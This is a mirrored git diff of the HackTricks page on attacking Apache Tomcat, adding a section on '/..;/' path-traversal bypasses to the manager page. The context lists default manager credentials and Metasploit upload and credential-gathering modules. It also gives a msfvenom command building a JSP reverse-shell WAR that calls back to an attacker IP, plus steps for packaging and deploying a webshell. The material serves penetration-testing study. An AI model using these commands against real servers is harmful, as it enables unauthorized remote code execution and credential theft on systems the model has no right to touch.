mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GitBook: [#2914] No subject
This commit is contained in:
parent
a02d06638b
commit
cf2bd3062d
1 changed files with 17 additions and 10 deletions
|
@ -16,11 +16,11 @@ msf> use auxiliary/scanner/http/tomcat_enum
|
|||
|
||||
## Default credentials
|
||||
|
||||
The most interesting path of Tomcat is _**/manager/html**_, inside that **path you can upload and deploy war files** \(execute code\). But this path is protected by basic HTTP auth, the most common credentials are:
|
||||
The most interesting path of Tomcat is _**/manager/html**_, inside that **path you can upload and deploy war files** (execute code). But this path is protected by basic HTTP auth, the most common credentials are:
|
||||
|
||||
* admin:admin
|
||||
* tomcat:tomcat
|
||||
* admin:<NOTHING>
|
||||
* admin:\<NOTHING>
|
||||
* admin:s3cr3t
|
||||
* tomcat:s3cr3t
|
||||
* admin:tomcat
|
||||
|
@ -49,12 +49,12 @@ A well-known vulnerability _to_ access the application manager \_\_ is mod\_jk i
|
|||
|
||||
In order to access to the management web of the Tomcat go to: _pathTomcat/%252E%252E/manager/html_
|
||||
|
||||
Take into account that to upload the webshell you might need to use the double urlencode trick and send also a cookie and/or a SSRF token.
|
||||
Take into account that to upload the webshell you might need to use the double urlencode trick and send also a cookie and/or a SSRF token.\
|
||||
To access to backdoor you might also need to use the double urlencode trick.
|
||||
|
||||
### /examples
|
||||
|
||||
The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting \(XSS\) injection \(from [here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)\).
|
||||
The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection (from [here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)).
|
||||
|
||||
* /examples/jsp/num/numguess.jsp
|
||||
* /examples/jsp/dates/date.jsp
|
||||
|
@ -79,13 +79,21 @@ The following example scripts that come with Apache Tomcat v4.x - v7.x and can b
|
|||
* /examples/servlet/SessionExample
|
||||
* /tomcat-docs/appdev/sample/web/hello.jsp
|
||||
|
||||
### Path Traversal (..;/)
|
||||
|
||||
In some **vulnerable versions of Tomcat** you can access to protected directories in Tomcat using the path: `/..;/`
|
||||
|
||||
So, for example, you might be able to **access the Tomcat manager** page accessing: `www.vulnerable.com/lalala/..;/manager/html`
|
||||
|
||||
**Another way** to bypass protected paths using this trick is to access `http://www.vulnerable.com/;param=value/manager/html`
|
||||
|
||||
## RCE
|
||||
|
||||
Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file \(execute code\)**.
|
||||
Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file (execute code)**.
|
||||
|
||||
### Limitations
|
||||
|
||||
You will only be able to deploy a WAR if you have **enough privileges** \(roles: **admin**, **manager** and **manager-script**\). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` \(it vary between versions\) \(see [POST ](tomcat.md#post)section\).
|
||||
You will only be able to deploy a WAR if you have **enough privileges** (roles: **admin**, **manager** and **manager-script**). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` (it vary between versions) (see [POST ](tomcat.md#post)section).
|
||||
|
||||
```bash
|
||||
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
|
||||
|
@ -114,11 +122,11 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit
|
|||
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=80 -f war -o revshell.war
|
||||
```
|
||||
|
||||
Then, upload the revshell.war file and access to it \(_/revshell/_\)
|
||||
Then, upload the revshell.war file and access to it (_/revshell/_)
|
||||
|
||||
### Bind and reverse shell with [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)
|
||||
|
||||
In some scenarios this doesn't work \(for example old versions of sun\)
|
||||
In some scenarios this doesn't work (for example old versions of sun)
|
||||
|
||||
#### Download
|
||||
|
||||
|
@ -178,7 +186,7 @@ $ jar -cvf ../webshell.war *
|
|||
webshell.war is created
|
||||
```
|
||||
|
||||
You could also install this \(allows upload, download and command execution\): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)
|
||||
You could also install this (allows upload, download and command execution): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)
|
||||
|
||||
## POST
|
||||
|
||||
|
@ -194,4 +202,3 @@ Other ways to gather Tomcat credentials:
|
|||
msf> use post/multi/gather/tomcat_gather
|
||||
msf> use post/windows/gather/enum_tomcat
|
||||
```
|
||||
|
||||
|
|
Loading…
Reference in a new issue